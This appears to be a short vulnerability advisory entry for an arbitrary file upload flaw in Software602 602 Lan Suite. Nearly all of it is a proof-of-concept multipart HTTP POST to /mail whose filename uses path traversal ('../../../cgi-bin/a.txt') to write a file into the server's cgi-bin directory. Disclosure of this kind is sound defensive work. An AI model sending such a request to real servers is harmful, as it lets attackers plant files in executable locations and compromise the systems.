|
|
Software602 602 Lan Suite Arbitrary File Upload Vulnerability
No exploit is required and the following proof of concept demonstrating a malicious file upload request is available: POST /mail HTTP/1.0 Host: localhost Content-Type: multipart/form-data; boundary=---------------------------287661860715985 Content-length: 540 -----------------------------287661860715985 Content-Disposition: form-data; name="U" 6E13745843714258F86310B04D7 -----------------------------287661860715985 Content-Disposition: form-data; name="A" ATTACHMENTS -----------------------------287661860715985 Content-Disposition: form-data; name="FILENAME"; filename="../../../cgi-bin/a.txt" Content-Type: text/plain Test File -----------------------------287661860715985 Content-Disposition: form-data; name="ATTACH" Attach -----------------------------287661860715985-- |
|
Privacy Statement |